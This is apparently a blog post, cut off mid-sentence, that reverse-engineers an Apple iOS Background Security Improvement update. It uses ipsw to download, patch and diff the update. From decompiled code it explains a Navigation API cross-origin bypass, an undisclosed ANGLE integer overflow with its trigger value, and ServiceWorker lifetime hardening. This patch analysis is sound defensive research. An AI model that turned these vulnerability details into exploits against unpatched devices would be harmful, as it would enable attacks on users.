url="https://substackcdn.com/image/fetch/$s_!j9FW!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Remember Rapid Security Responses (RSR)? 
Apple introduced RSR in macOS Ventura / iOS 16 to ship urgent security patches outside of full OS updates. It was used exactly once, <a href="https://mjtsai.com/blog/2025/09/23/rapid-security-responses-become-background-security-improvements/">broke websites</a> (the parentheses RSR added to the User-Agent string confused half the Internet), and was quietly shelved.</p><p>With iOS 26.1, iPadOS 26.1, and macOS 26.1, Apple replaced RSR with Background Security Improvements (BSI). The big change: BSI installs silently.</p><p>On March 17, 2026, Apple shipped four BSI updates across iOS, iPadOS, and macOS. </p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;71b38c3c-9acb-439e-b590-5c215ed1b47e&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">| Platform | Version    | Build      |
+----------+------------+------------+
| iOS      | 26.3.1 (a) | 23D771330a |
| iPadOS   | 26.3.1 (a) | 23D771330a |
| macOS    | 26.3.2 (a) | 25D771400a |
| macOS    | 26.3.1 (a) | 25D771280a |
+----------+------------+------------+</code></pre></div><p>I grabbed the iOS update, tore it apart with <a href="https://github.com/blacktop/ipsw">ipsw</a>, and diffed it against the base OS to see what actually changed.</p><p>This post walks through how BSI updates work under the hood. More importantly, it shows what Apple actually shipped: one publicly disclosed WebKit CVE, and at least two additional security-relevant changes that didn&#8217;t make it into the advisory.</p><h3>How BSI differs from RSR</h3><p>Both target the same thing: security patches for Safari, WebKit, and system libraries without a full OS update. Under the hood, both work by patching cryptexes. If you haven&#8217;t run into these before: Apple moved content eligible for rapid patching (Safari, WebKit, system libs) into sealed disk images on the preboot volume, split into system and app subtypes. When an update arrives, the device applies a binary diff to the relevant cryptex image, then asks Apple&#8217;s signing service for a new Cryptex1Image4 manifest. The main application processor (AP) boot ticket stays untouched. On restart, the kernel bootstraps the patched content with new measurements and trust caches. That&#8217;s why these updates apply with minimal battery impact and no re-sealing; they&#8217;re patching a sidecar image, not the root filesystem. 
<a href="https://support.apple.com/guide/security/background-security-improvements-sec87fc038c2/web">Apple&#8217;s security docs</a> have the full picture.</p><p>The following table summarizes the changes between RSR and BSI:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!j9FW!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!j9FW!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png 424w, https://substackcdn.com/image/fetch/$s_!j9FW!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png 848w, https://substackcdn.com/image/fetch/$s_!j9FW!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png 1272w, https://substackcdn.com/image/fetch/$s_!j9FW!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!j9FW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png" width="1272" height="562" 
data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:562,&quot;width&quot;:1272,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:92852,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://blog.calif.io/i/192281495?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!j9FW!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png 424w, https://substackcdn.com/image/fetch/$s_!j9FW!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png 848w, https://substackcdn.com/image/fetch/$s_!j9FW!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png 1272w, https://substackcdn.com/image/fetch/$s_!j9FW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25c011f1-a506-488d-a9be-ac2760081c12_1272x562.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" 
viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>The versioning scheme carries over: a BSI applied on top of iOS 26.3 becomes iOS 26.3.1 (a). These are cumulative, so the next full update (say, iOS 26.4) absorbs all prior BSI fixes.</p><p>I will now show you how to analyze the BSI with <code>ipsw</code>.</p><h3>Downloading a BSI with ipsw</h3><p>Same as RSR. Use the <code>--rsr</code> flag with the prerequisite <code>--build</code>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;bada5d88-9c0c-4750-9989-fa5b59d5232a&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#10095; ipsw dl ota --platform ios \
              --rsr \
              --device iPhone17,1 \
              --build 23D8133 \
              --output /tmp/BSI
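# annotation, not part of the captured run: per the notes below,
# --rsr selects the BSI ("Splat") asset type and --build names the
# prerequisite base build the delta applies on top of, not the
# BSI's own build number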
   &#8226; Getting iOS 26.3.1 OTA    build=23D771330a device=iPhone17,1
     encrypted=true key=ER+89JD/fR9xK0MwXhPHfkmPRMnAxBNkOF5v8nfGzk0=
     model=D93AP type=iOS2631BetaBSI
        26.50 MiB / 26.50 MiB [==============================| &#9989; ] 30.58 MiB/s</code></pre></div><p>26.5 MiB total. A full OTA is 3-17 GB. That size difference is the whole point: small, targeted patches to the cryptex volumes.</p><p>The <code>--build</code> flag is the prerequisite build (the base OS the BSI patches on top of), not the BSI build itself. Find the latest build with:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;afe62274-8e63-4003-b166-77810ff287fc&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#10095; ipsw download ota --platform ios --device iPhone17,1 --show-latest-build</code></pre></div><h3>Inspecting the BSI OTA</h3><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;044bab6e-521f-4fa2-b72f-da88815a9f82&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#10095; ipsw ota info &lt;BSI&gt;.aea

[OTA Info]
==========
Version        = 26.3.1 (a)
BuildVersion   = 23D771330a
OS Type        = SplatPreRelease
SystemOS       = 043-61970-021.dmg
AppOS          = 043-62774-021.dmg
RestoreVersion = 23.4.133.77.1,0
PrereqBuild    = 23D8133
IsRSR          = &#9989;

Devices
-------
 &gt; iPhone17,1_23D771330a</code></pre></div><p><code>PrereqBuild = 23D8133</code> tells you this is a delta on top of iOS 26.3 build <code>23D8133</code>. The <code>IsRSR</code> flag is still there because internally Apple still calls this the &#8220;Splat&#8221; system (SplatOnly in asset metadata). Two separate cryptex DMGs get patched: SystemOS for frameworks and AppOS for apps.</p><h3>What&#8217;s in the package</h3><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;deb9edce-ad1e-4896-94de-041a07cc86dd&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#10095; ipsw ota ls &lt;BSI&gt;.aea -V -b

AssetData/
&#9500;&#9472;&#9472; Info.plist                                          # 1.7 kB
&#9500;&#9472;&#9472; boot/
&#9474;   &#9500;&#9472;&#9472; BuildManifest.plist                             # 19 kB
&#9474;   &#9500;&#9472;&#9472; Firmware/
&#9474;   &#9474;   &#9500;&#9472;&#9472; 043-61970-021.dmg.root_hash                # 229 B
&#9474;   &#9474;   &#9500;&#9472;&#9472; 043-61970-021.dmg.trustcache               # 2.7 kB
&#9474;   &#9474;   &#9500;&#9472;&#9472; 043-62774-021.dmg.root_hash                # 229 B
&#9474;   &#9474;   &#9492;&#9472;&#9472; 043-62774-021.dmg.trustcache               # 407 B
&#9474;   &#9500;&#9472;&#9472; Restore.plist
&#9474;   &#9500;&#9472;&#9472; RestoreVersion.plist
&#9474;   &#9492;&#9472;&#9472; SystemVersion.plist
&#9500;&#9472;&#9472; payload.bom                                         # 38 kB
&#9500;&#9472;&#9472; payload.bom.signature
&#9500;&#9472;&#9472; payloadv2.bom                                       # 38 kB
&#9500;&#9472;&#9472; payloadv2.bom.signature
&#9492;&#9472;&#9472; payloadv2/
    &#9500;&#9472;&#9472; image_patches/
    &#9474;   &#9500;&#9472;&#9472; cryptex-app                                 # 39 kB
    &#9474;   &#9500;&#9472;&#9472; cryptex-app-rev                             # 39 kB
    &#9474;   &#9500;&#9472;&#9472; cryptex-system-arm64e                       # 15 MB
    &#9474;   &#9492;&#9472;&#9472; cryptex-system-arm64e-rev                   # 15 MB
    &#9500;&#9472;&#9472; data_payload                                    # 12 B
    &#9500;&#9472;&#9472; firmlinks_payload                               # 0 B
    &#9500;&#9472;&#9472; fixup.manifest
    &#9500;&#9472;&#9472; links.txt                                       # 0 B
    &#9500;&#9472;&#9472; payload.000                                     # 78 B
    &#9500;&#9472;&#9472; payload.000.ecc                                 # 123 B
    &#9500;&#9472;&#9472; payload_chunks.txt
    &#9500;&#9472;&#9472; prepare_payload                                 # 12 B
    &#9492;&#9472;&#9472; removed.txt                                     # 0 B</code></pre></div><p>Almost everything interesting is in <code>payloadv2/image_patches/</code>. <code>cryptex-system-arm64e</code> at 15 MB is the binary patch for the system cryptex (WebKit, Safari, system libraries). <code>cryptex-app</code> at 39 KB patches the app cryptex. The <code>-rev</code> variants are reverse patches for rolling back a BSI to the base OS state.</p><p>Under <code>boot/Firmware/</code>, the <code>.root_hash</code> and <code>.trustcache</code> files bind the patched cryptexes into the device&#8217;s Secure Boot chain via a separate <code>Cryptex1Image4</code> manifest.</p><h3>Patching the cryptex volumes</h3><p>To apply the patches and get mountable DMGs, use <code>ipsw ota patch rsr</code>. You need the base OTA&#8217;s cryptex volumes first, so download the prerequisite OTA (the 7.81 GiB one):</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;62b8456b-cf1a-4ed7-8d3d-ef8bc32c879a&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#10095; ipsw dl ota --platform ios --device iPhone17,1 --build 23D8133 --output /tmp/OTAs/
   &#8226; Getting iOS 26.3.1 OTA    build=23D8133 device=iPhone17,1
     encrypted=true key=P1OahXDSqR+X5Lc63VFT9JDZFtR6cHtIc+ryyJ9kuLs=
     model=D93AP type=iOS2631Long
      &#8226; URL resolved to: 17.253.27.196 (Apple Inc - Chicago, IL. United States)
        7.81 GiB / 7.81 GiB [==============================| &#9989; ] 59.81 MiB/s</code></pre></div><p>Extract the base cryptex volumes from it:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;c31a8c46-108b-4351-af56-e63ede90ea48&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#10095; ipsw ota patch rsr &lt;base_ota&gt;.aea --output /tmp/PATCHES/
   &#8226; Patching cryptex-app to /tmp/PATCHES/23D8133__iPhone17,1/AppOS/094-25810-058.dmg
   &#8226; Patching cryptex-system-arm64e to /tmp/PATCHES/23D8133__iPhone17,1/SystemOS/094-26339-058.dmg</code></pre></div><p>Now apply the BSI patch on top:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;80620562-77a8-4886-b813-4ffe303d48d8&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#10095; ipsw ota patch rsr --input /tmp/PATCHES/23D8133__iPhone17,1/ \
                      --output /tmp/PATCHES/ \
                      &lt;BSI&gt;.aea
   &#8226; Patching cryptex-app to /tmp/PATCHES/23D771330a__iPhone17,1/AppOS/043-62774-021.dmg
   &#8226; Patching cryptex-system-arm64e to /tmp/PATCHES/23D771330a__iPhone17,1/SystemOS/043-61970-021.dmg</code></pre></div><p>You now have the patched cryptex DMGs. Mount and poke around:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;0823d593-1d52-4d8b-9d38-ab3c88081695&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#10095; open /tmp/PATCHES/23D771330a__iPhone17,1/SystemOS/043-61970-021.dmg
&#10095; find /Volumes/*Cryptex*/ -name "dyld_shared_cache*"</code></pre></div><p>NOTE: <code>ipsw ota patch rsr</code> requires macOS 13+ because it calls <code>RawImagePatch</code> in <code>libParallelCompression.dylib</code> to apply the binary image diffs. This is a private API I reversed with no public header.</p><h3>Diffing the BSI</h3><p>Now the fun part. I&#8217;ve updated <code>ipsw diff</code> to work directly with patched OTA directories:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;32834311-cd86-497f-be04-aa7c2061a018&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#10095; ipsw diff /tmp/PATCHES/23D8133__iPhone17,1 \
            /tmp/PATCHES/23D771330a__iPhone17,1 \
            --files --output /tmp/DIFF --markdown
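# annotation, not part of the captured run: the two positional
# arguments are the patched base and BSI directories produced by
# the earlier steps; --markdown writes the report as a README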
   &#8226; Mounting patched OTA DMGs
   &#8226; Mounting &#8216;Old&#8217; patched OTA DMGs
   &#8226; Mounting AppOS DMG
      &#8226; Mounting /tmp/PATCHES/23D8133__iPhone17,1/AppOS/094-25810-058.dmg
   &#8226; Mounting SystemOS DMG
      &#8226; Mounting /tmp/PATCHES/23D8133__iPhone17,1/SystemOS/094-26339-058.dmg
   &#8226; Mounting &#8216;New&#8217; patched OTA DMGs
   &#8226; Mounting AppOS DMG
      &#8226; Mounting /tmp/PATCHES/23D771330a__iPhone17,1/AppOS/043-62774-021.dmg
   &#8226; Mounting SystemOS DMG
      &#8226; Mounting /tmp/PATCHES/23D771330a__iPhone17,1/SystemOS/043-61970-021.dmg
   &#8226; Diffing DYLD_SHARED_CACHES
   &#8226; Diffing MachOs
   &#8226; Diffing Files
   &#8226; Creating diff file Markdown README</code></pre></div><p>It mounts both sets of cryptex DMGs, diffs the <code>dyld_shared_cache</code>, individual MachOs, and the file trees, then writes a Markdown report. The full diff output is <a href="https://github.com/blacktop/ipsw-diffs/blob/main/23D8133__iPhone17,1__vs_23D771330a__iPhone17,1/README.md">on GitHub</a>.</p><p>NOTE: <code>ipsw diff</code> operates at the <strong>symbol level</strong>, not the instruction level. It reports added/removed symbols, function count changes, and section size deltas -- but it will miss changes <em>inside</em> a function whose signature didn&#8217;t change. For example, the CVE-2026-20643 fix added 46 instructions to <code>innerDispatchNavigateEvent</code> without changing its symbol name, so the diff report doesn&#8217;t flag it at all. To catch those, you need to decompile the actual functions (IDA Pro, Ghidra, or <code>ipsw dsc disass --dec</code>, for now &#128527;) and compare the pseudocode. The diff is a great starting point for triage, but it&#8217;s not the full picture.</p><p>So what did Apple actually change?</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;9a4f4802-5b6a-4b5d-927a-b4496eb29731&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">WebKit version bump
+----------------------+----------------+
|                      | Version        |
+----------------------+----------------+
| Base (23D8133)       | 7623.2.7.10.4  |
| BSI (23D771330a)     | 7623.2.7.110.1 |
+----------------------+----------------+</code></pre></div><p>That&#8217;s the Safari/WebKit version going from <code>7623.2.7.10.4</code> to <code>7623.2.7.110.1</code>.</p><p>NOTE: Normally <code>ipsw dsc webkit --git</code> resolves a DSC&#8217;s WebKit version to the exact public git tag on <a href="https://github.com/WebKit/WebKit">github.com/WebKit/WebKit</a>, giving you a clean <code>git diff</code> between two tags. Here, neither version had an exact match and both fell back to the closest tag <code>WebKit-7623.1.14.14.11</code> from November 2025. My guess is Apple ships BSI builds from an internal branch that never gets tagged publicly. I had to find the fix commit manually (more on that below).</p><h4>Updated binaries in AppOS (6)</h4><p>All Safari-related:</p><ul><li><p><code>AuthenticationServicesAgent</code>: handles web authentication flows</p></li><li><p><code>com.apple.Safari.History</code></p></li><li><p><code>passwordbreachd</code>: checks passwords against breach databases</p></li><li><p><code>safarifetcherd</code>: prefetching/background loading</p></li><li><p><code>webbookmarksd</code>: bookmark sync daemon</p></li><li><p><code>webinspectord</code>: Web Inspector remote debugging</p></li></ul><p>Every one got the same version bump (<code>7623.2.7.10.4</code> -&gt; <code>7623.2.7.110.1</code>). The changes are mostly in <code>__TEXT.__info_plist</code> sizes (a few bytes larger) and new UUIDs. The actual code sections didn&#8217;t change in these binaries, so the AppOS patch is just version metadata and plist updates.</p><h4>Updated dylibs in the dyld_shared_cache (6)</h4><p>The <code>dyld_shared_cache</code> is where the actual code changes live. 
Six dylibs changed:</p><ol><li><p><code>WebCore</code></p></li><li><p><code>libANGLE-shared.dylib</code></p></li><li><p><code>WebGPU</code></p></li><li><p><code>ProductKit</code></p></li><li><p><code>ProductKitCore</code></p></li><li><p><code>SettingsFoundation</code></p></li></ol><p>I opened both DSC versions in IDA Pro (using <code>open_dsc</code> to load individual modules) and decompiled the changed functions.</p><h3>CVE-2026-20643: Navigation API Same-Origin bypass</h3><p>Apple&#8217;s <a href="https://support.apple.com/en-us/126604">security advisory</a> describes one fix:</p><blockquote><p><strong>WebKit</strong> -- A cross-origin issue in the Navigation API was addressed with improved input validation.</p><p>CVE-2026-20643 -- Thomas Espach</p></blockquote><p>The Navigation API (<code>window.navigation</code>) lets JavaScript intercept and control navigations within a page. The property that matters here is <code>NavigateEvent.canIntercept</code> because it tells a script whether it&#8217;s allowed to intercept a given navigation. 
<a href="https://html.spec.whatwg.org/multipage/nav-history-apis.html#can-have-its-url-rewritten">The spec</a> says it should be false when the document URL and target URL differ in scheme, username, password, host, or port.</p><h4>The source fix</h4><p>Since WebKit is open source, I tracked down the public trail:</p><ul><li><p><strong>PR:</strong> <a href="https://github.com/WebKit/WebKit/pull/58094">WebKit/WebKit#58094</a> -- <em>&#8220;NavigationEvent#canIntercept is true when navigating to a different port&#8221;</em></p></li><li><p><strong>Bugzilla:</strong> <a href="https://bugs.webkit.org/show_bug.cgi?id=307197">Bug 307197</a> -- reported by Dom Christie on 2026-02-06, fixed by Ahmad Saleem</p></li><li><p><strong>Commit:</strong> <a href="https://commits.webkit.org/307316@main">850ce3163e55</a></p></li><li><p><strong>Shipped in:</strong> Safari Technology Preview 238</p></li></ul><p>Apple&#8217;s CVE advisory references a different bug number (Bugzilla #306050, which is private). Bug 307197 is either the public duplicate or the upstream report that the security-track bug was filed against.</p><p>The fix is in <code>Source/WebCore/page/Navigation.cpp</code>, function <code>documentCanHaveURLRewritten()</code>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;cpp&quot;,&quot;nodeId&quot;:&quot;e7648d81-1e5f-4aff-ae43-e1b1a08620a6&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-cpp"> static bool documentCanHaveURLRewritten(const Document&amp; document, const URL&amp; targetURL)
 {
     // ...existing isSameSite and isSameOrigin checks...
     if (!isSameSite &amp;&amp; !isSameOrigin)
         return false;
+    // https://html.spec.whatwg.org/multipage/nav-history-apis.html#can-have-its-url-rewritten
+    if (documentURL.protocol() != targetURL.protocol()
+        || documentURL.user() != targetURL.user()
+        || documentURL.password() != targetURL.password()
+        || documentURL.host() != targetURL.host()
+        || documentURL.port() != targetURL.port())
+        return false;
+
     if (targetURL.protocolIsInHTTPFamily())
         return true;</code></pre></div><p>You might wonder: doesn&#8217;t <code>isSameOriginAs</code> already check the port? It does. <a href="https://github.com/WebKit/WebKit/blob/main/Source/WebCore/page/SecurityOrigin.cpp">Looking at the source</a>, <code>isSameOriginAs()</code> calls <code>isSameSchemeHostPort()</code>, which compares scheme, host, and port.</p><p>The problem is the boolean logic <em>upstream</em> of this function. The caller in <code>documentCanHaveURLRewritten()</code> combined both checks with <strong>AND</strong>: <code>if (!isSameSite &amp;&amp; !isSameOrigin) return false</code>. Since <code>localhost:3000</code> and <code>localhost:3001</code> share the same registrable domain and scheme, isSameSiteAs returns true. That short-circuits the AND so the <code>isSameOriginAs</code> result never matters. The function falls straight through to return true for any HTTP URL.</p><h4>Confirming in the binary</h4><p>I confirmed this by decompiling <code>WebCore::Navigation::innerDispatchNavigateEvent</code> (at <code>0x1a1307304</code>) from both DSC versions in IDA Pro.</p><p>The base version calls two origin checks joined by AND:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;cpp&quot;,&quot;nodeId&quot;:&quot;60c85edf-995a-40fa-9433-dd9897856a14&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-cpp">// BASE innerDispatchNavigateEvent (23D8133 DSC)
isSameSiteAs = SecurityOrigin::isSameSiteAs(docOrigin, navOrigin);
isSameOriginAs = SecurityOrigin::isSameOriginAs(docOrigin, navOrigin);
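// annotation, not decompiler output: for http://localhost:3000 vs
// http://localhost:3001, isSameSiteAs is true (same scheme and
// registrable domain) while isSameOriginAs is false (different
// port), so the condition below never fires and the navigation
// is treated as interceptable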
if ((isSameSiteAs &amp; 1) == 0 &amp;&amp; !isSameOriginAs)
    isCrossOrigin = true;  // only blocked if BOTH fail</code></pre></div><p>The patched version drops isSameSiteAs and adds explicit URL component comparison instead:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;cpp&quot;,&quot;nodeId&quot;:&quot;a85470b7-af3a-433e-ace6-7ef5661e27a2&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-cpp">// PATCHED innerDispatchNavigateEvent (23D771330a DSC)
if (SecurityOrigin::isSameOriginAs(docOrigin, navOrigin)) {
    docHost = URL::host(documentURL);
    navHost = URL::host(targetURL);
    if (String::equal(docHost, navHost)) {
        docPort = URL::port(documentURL);
        navPort = URL::port(targetURL);
        isCrossOrigin = !String::equal(docPort, navPort);
    } else {
        isCrossOrigin = true;
    }
} else {
    isCrossOrigin = true;
}</code></pre></div><p>The function grew by 46 ARM64 instructions (1243 -&gt; 1289). The <code>isSameSiteAs</code> call was deleted entirely.</p><p>What does this mean in practice? A page on <code>http://localhost:3000</code> could intercept navigations targeting <code>http://localhost:8080</code>. These are different ports and origins, but WebKit lets it through. In a shared-hosting or multi-tenant setup, that&#8217;s cross-origin state manipulation.</p><h3>What Apple didn&#8217;t disclose</h3><p>The CVE covers the Navigation API fix. But this BSI also shipped two other changes that aren&#8217;t in the advisory &#128578;.</p><h4>WebGL integer overflow in ANGLE</h4><p><code>libANGLE-shared.dylib</code> (Apple&#8217;s Metal-backed ANGLE for OpenGL ES) changed the <code>ProvokingVertexHelper::generateIndexBuffer</code> and <code>preconditionIndexBuffer</code> methods. The parameter types narrowed from <code>size_t</code> (64-bit) to <code>int/unsigned int</code> (32-bit), and both functions grew in size (<code>generateIndexBuffer</code> went from 680 to 772 bytes per IDA; <code>preconditionIndexBuffer</code> grew similarly per the symbol diff).</p><p>I decompiled <code>generateIndexBuffer</code> from both DSC versions in IDA Pro. Here&#8217;s the relevant section, side by side.</p><p><strong>Base</strong> (<code>23D8133</code>, <code>size_t</code> parameters, no overflow check):</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;71224eaa-7856-4a22-9133-1e6c8fb89e80&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">LODWORD(v18) = a4 &amp; ~(a4 &gt;&gt; 31);
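// annotation, not decompiler output: a4 &amp; ~(a4 &gt;&gt; 31) is a
// branchless max(a4, 0): if a4 is negative, the arithmetic shift
// yields all-ones, its complement is 0, and the AND clamps the
// count to zero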
v36 = v18;
v20 = 2 * v18;   // index count &#8212; no overflow check
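// (v18 is only 32 bits wide here, so a vertex count of 0x80000000
//  makes 2 * v18 wrap to 0 and the allocation below comes out far
//  too small)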
// ... v20 flows directly into buffer allocation size</code></pre></div><p><strong>Patched</strong> (<code>23D771330a</code>, <code>int</code> parameters, overflow guard added):</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;35af37c3-e50d-4513-a139-adff3a37e0d0&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">LODWORD(v34) = a4;
v20 = 2LL * a4;    // widen to 64-bit before multiply
v35 = v20;
// ... then before using the result:
if (HIDWORD(v20))  // upper 32 bits non-zero &#8594; overflow
{
    handleError(a2, GL_INVALID_OPERATION,
        "Integer overflow.",
        ".../ProvokingVertexHelper.mm",
        "generateIndexBuffer", 217);
    return 1;
}</code></pre></div><p>In the base version, the count is clamped and truncated to 32 bits (<code>LODWORD</code>) and <code>2 * vertexCount</code> is computed in 32-bit arithmetic, so a large enough input wraps silently and the buffer allocation comes out too small. After the fix, the multiply widens to 64-bit first (<code>2LL * a4</code>), then checks the upper 32 bits. Non-zero means overflow, and the function bails with <code>GL_INVALID_OPERATION</code> instead of allocating a short buffer.</p><p>In the Metal rendering path, an undersized index buffer means an out-of-bounds GPU read during WebGL draw calls. The new assertion strings (&#8220;<code>generateIndexBuffer</code>&#8221;, &#8220;<code>preconditionIndexBuffer</code>&#8221;, and the ANGLE source path) confirm this was an intentional hardening pass, not just a type cleanup.</p><h4>ServiceWorker registration lifetime hardening</h4><p><code>WebCore</code> dropped 6 functions and 14 symbols, all in the ServiceWorker server implementation:</p><ul><li><p><code>HashMap&lt;ProcessQualified&lt;UUID&gt;, WeakRef&lt;SWServerRegistration&gt;&gt;</code> replaced with <code>HashMap&lt;..., Ref&lt;SWServerRegistration&gt;&gt;</code> (weak -&gt; strong references)</p></li><li><p><code>SWServerRegistration</code> changed from <code>RefCountedAndCanMakeWeakPtr</code> to plain <code>RefCounted</code> (weak pointer support removed)</p></li><li><p><code>SWServerJobQueue::cancelJobsFromServiceWorker</code> removed entirely</p></li><li><p>Several hash map lookup/removal helpers for <code>ProcessQualified&lt;UUID&gt;</code> maps were removed</p></li></ul><p>With the <code>WeakRef</code>-<code>Ref</code> change, the 